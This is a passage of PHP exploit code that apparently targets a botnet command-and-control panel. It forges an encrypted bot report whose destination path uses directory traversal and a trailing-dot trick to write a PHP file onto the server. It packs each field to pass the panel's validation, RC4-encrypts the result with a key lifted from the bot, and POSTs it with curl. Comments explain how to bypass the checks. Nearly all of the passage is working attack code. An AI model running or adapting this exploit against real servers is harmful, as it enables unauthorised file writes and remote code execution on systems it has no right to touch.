"; // You don't need to change these values... but they are very important, so I call them out // We need to explictly set SBCID_BOTLOG_TYPE to 3 in order to get the logging to work, // I pack the value as an UNSIGNED INT as the C&C will unpack this value during its string to INT conversion // and assumes an UNSIGNED LONG INT // // $SBCID_PATH_DEST_String contains a trailing dot. This is used to bypass validation routines and ultimely leads to // compromise of the C&C. The trailing dot trick works on both Windows and Linux based systems :) // // The BOT_ID and BOTNET strings are used in the filepath where the php file gets written to // if you use the values below (and the default settings are in place) the php file will end up at: // http://cnc/_reports/files/BK_PWNZ_UR_CnC/BKs_BOTNET/pwnd.php // There is some validation on BOT_ID_String and BOTNET_String, so becareful when using special chars $SBCID_BOTLOG_TYPE_String = pack("l",3); $SBCID_PATH_DEST_String = "..../..../..../..../pwnd.php.";//trailing dot is key $SBCID_BOT_ID_String = "BK_PWNZ_UR_CnC"; $SBCID_BOTNET_String = "BKs_BOTNET"; // The rest of this stuff can be changed to what ever you want. // There is some validation for some fields so becareful when using special chars $SBCID_BOT_VERSION_String = "31337"; $SBCID_TIME_SYSTEM_String = 0; $SBCID_TIME_LOCALBIAS_String = 0; $SBCID_TIME_TICK_String = 0; $SBCID_OS_INFO_String = "OTHER"; $SBCID_LANGUAGE_ID_String = "1033"; $SBCID_PROCESS_NAME_String = "C:\Program Files\Internet Explorer\IEXPLORE.EXE"; $SBCID_PROCESS_USER_String = "GOTCHA\PWND"; $SBCID_PATH_SOURCE_String = "https://www.pwnd.com"; $header = "AAAAAAAAAAAA"; $payload = ""; /* Below I set up all the data needed to get through the C&C validation I used arrays and individually packed each array as I found this was the easiest way to debug/test validation. There are probably more efficient ways of doing this... 
*/ $SBCID_BOT_ID = array(); $SBCID_BOT_ID[1]=10001; $SBCID_BOT_ID[2]=0; $SBCID_BOT_ID[3]=strlen ( $SBCID_BOT_ID_String ); $SBCID_BOT_ID[4]=strlen ( $SBCID_BOT_ID_String ); foreach ($SBCID_BOT_ID as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOT_ID_String; $SBCID_BOTNET = array(); $SBCID_BOTNET[1]=10002; $SBCID_BOTNET[2]=0; $SBCID_BOTNET[3]=strlen ( $SBCID_BOTNET_String ); $SBCID_BOTNET[4]=strlen ( $SBCID_BOTNET_String ); foreach ($SBCID_BOTNET as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOTNET_String; $SBCID_BOT_VERSION = array(); $SBCID_BOT_VERSION[1]=10003; $SBCID_BOT_VERSION[2]=0; $SBCID_BOT_VERSION[3]=strlen ( $SBCID_BOT_VERSION_String ); $SBCID_BOT_VERSION[4]=strlen ( $SBCID_BOT_VERSION_String ); foreach ($SBCID_BOT_VERSION as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOT_VERSION_String; $SBCID_TIME_SYSTEM = array(); $SBCID_TIME_SYSTEM[1]=10009; $SBCID_TIME_SYSTEM[2]=0; $SBCID_TIME_SYSTEM[3]=strlen ( $SBCID_TIME_SYSTEM_String ); $SBCID_TIME_SYSTEM[4]=strlen ( $SBCID_TIME_SYSTEM_String ); foreach ($SBCID_TIME_SYSTEM as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_TIME_SYSTEM_String; $SBCID_TIME_LOCALBIAS = array(); $SBCID_TIME_LOCALBIAS[1]=10011; $SBCID_TIME_LOCALBIAS[2]=0; $SBCID_TIME_LOCALBIAS[3]=strlen ( $SBCID_TIME_LOCALBIAS_String ); $SBCID_TIME_LOCALBIAS[4]=strlen ( $SBCID_TIME_LOCALBIAS_String ); foreach ($SBCID_TIME_LOCALBIAS as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_TIME_LOCALBIAS_String; $SBCID_TIME_TICK = array(); $SBCID_TIME_TICK[1]=10010; $SBCID_TIME_TICK[2]=0; $SBCID_TIME_TICK[3]=strlen ( $SBCID_TIME_TICK_String ); $SBCID_TIME_TICK[4]=strlen ( $SBCID_TIME_TICK_String ); foreach ($SBCID_TIME_TICK as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_TIME_TICK_String; $SBCID_OS_INFO = array(); $SBCID_OS_INFO[1]=10012; 
$SBCID_OS_INFO[2]=0; $SBCID_OS_INFO[3]=strlen ( $SBCID_OS_INFO_String ); $SBCID_OS_INFO[4]=strlen ( $SBCID_OS_INFO_String ); foreach ($SBCID_OS_INFO as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_OS_INFO_String; $SBCID_LANGUAGE_ID = array(); $SBCID_LANGUAGE_ID[1]=10013; $SBCID_LANGUAGE_ID[2]=0; $SBCID_LANGUAGE_ID[3]=strlen ( $SBCID_LANGUAGE_ID_String ); $SBCID_LANGUAGE_ID[4]=strlen ( $SBCID_LANGUAGE_ID_String ); foreach ($SBCID_LANGUAGE_ID as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_LANGUAGE_ID_String; $SBCID_PROCESS_NAME = array(); $SBCID_PROCESS_NAME[1]=10014; $SBCID_PROCESS_NAME[2]=0; $SBCID_PROCESS_NAME[3]=strlen ( $SBCID_PROCESS_NAME_String ); $SBCID_PROCESS_NAME[4]=strlen ( $SBCID_PROCESS_NAME_String ); foreach ($SBCID_PROCESS_NAME as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_PROCESS_NAME_String; $SBCID_PROCESS_USER = array(); $SBCID_PROCESS_USER[1]=10017; $SBCID_PROCESS_USER[2]=0; $SBCID_PROCESS_USER[3]=strlen ( $SBCID_PROCESS_USER_String ); $SBCID_PROCESS_USER[4]=strlen ( $SBCID_PROCESS_USER_String ); foreach ($SBCID_PROCESS_USER as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_PROCESS_USER_String; $SBCID_BOTLOG_TYPE = array(); $SBCID_BOTLOG_TYPE[1]=10015; $SBCID_BOTLOG_TYPE[2]=0; $SBCID_BOTLOG_TYPE[3]=strlen ( $SBCID_BOTLOG_TYPE_String ); $SBCID_BOTLOG_TYPE[4]=strlen ( $SBCID_BOTLOG_TYPE_String ); foreach ($SBCID_BOTLOG_TYPE as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOTLOG_TYPE_String; $SBCID_BOTLOG = array(); $SBCID_BOTLOG[1]=10016; $SBCID_BOTLOG[2]=0; $SBCID_BOTLOG[3]=strlen ( $SBCID_BOTLOG_String ); $SBCID_BOTLOG[4]=strlen ( $SBCID_BOTLOG_String ); foreach ($SBCID_BOTLOG as $individ) { $payload = $payload.pack('L',$individ); } $payload = $payload.$SBCID_BOTLOG_String; $SBCID_PATH_SOURCE = array(); $SBCID_PATH_SOURCE[1]=10007; $SBCID_PATH_SOURCE[2]=0; 
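$SBCID_PATH_SOURCE[3]=strlen ( $SBCID_PATH_SOURCE_String );
$SBCID_PATH_SOURCE[4]=strlen ( $SBCID_PATH_SOURCE_String );
foreach ($SBCID_PATH_SOURCE as $individ) { $payload = $payload.pack('L',$individ); }
$payload = $payload.$SBCID_PATH_SOURCE_String;
$SBCID_PATH_DEST = array();
$SBCID_PATH_DEST[1]=10008;
$SBCID_PATH_DEST[2]=0;
$SBCID_PATH_DEST[3]=strlen ( $SBCID_PATH_DEST_String );
$SBCID_PATH_DEST[4]=strlen ( $SBCID_PATH_DEST_String );
foreach ($SBCID_PATH_DEST as $individ) { $payload = $payload.pack('L',$individ); }
$payload = $payload.$SBCID_PATH_DEST_String;
// Header layout as built here: 12 fixed bytes, then the raw (binary) md5 of the body, then the body.
$header = $header.md5($payload,true);
$header = $header.$payload;
// The C&C will validate that the payload is RC4'd with the encryption key
// this key can be pulled from the bot
$fullpayload = RC4($header, $RC4KEY);
// Use Curl to setup a POST request.
// Pass the RC4'd binary data to the server
// The URL to the gate is given away by the bot
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $urlofCnC);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, $fullpayload);
curl_exec ($c);
curl_close ($c);
// Stolen from the botmaster / C&C code
// This way we know the RC4 function will work perfectly
/**
 * Plain RC4 (key-scheduling algorithm followed by the pseudo-random
 * generation algorithm), byte-for-byte the routine the C&C uses, so the
 * gate accepts the output. RC4 is a broken legacy cipher and is kept here
 * only for wire compatibility; do not reuse it for anything else.
 *
 * Encrypting and decrypting are the same operation (XOR with the keystream).
 *
 * @param string $data bytes to encrypt or decrypt
 * @param string $key  RC4 key; bytes are cycled if shorter than 256
 *
 * @return string ciphertext (or plaintext) of the same length as $data
 *
 * @throws InvalidArgumentException when $key is empty (the original indexed
 *         $key[$x % 0] and died with a bare DivisionByZeroError)
 */
function RC4($data, $key)
{
    $keyLength = strlen($key);
    if ($keyLength === 0) {
        throw new InvalidArgumentException('RC4 key must not be empty');
    }
    $dataLength = strlen($data);

    // KSA: seed the S-box with the identity permutation and a repeated key schedule.
    $keySchedule = array();
    $box = array();
    for ($i = 0; $i < 256; $i++) {
        $keySchedule[$i] = ord($key[$i % $keyLength]);
        $box[$i] = $i;
    }
    for ($i = $j = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $keySchedule[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // PRGA: one keystream byte per input byte, XORed in.
    $out = '';
    for ($n = $i = $j = 0; $n < $dataLength; $n++) {
        $i = ($i + 1) % 256;
        $j = ($j + $box[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
        $keystreamByte = $box[($box[$i] + $box[$j]) % 256];
        $out .= chr(ord($data[$n]) ^ $keystreamByte);
    }
    return $out;
}
?>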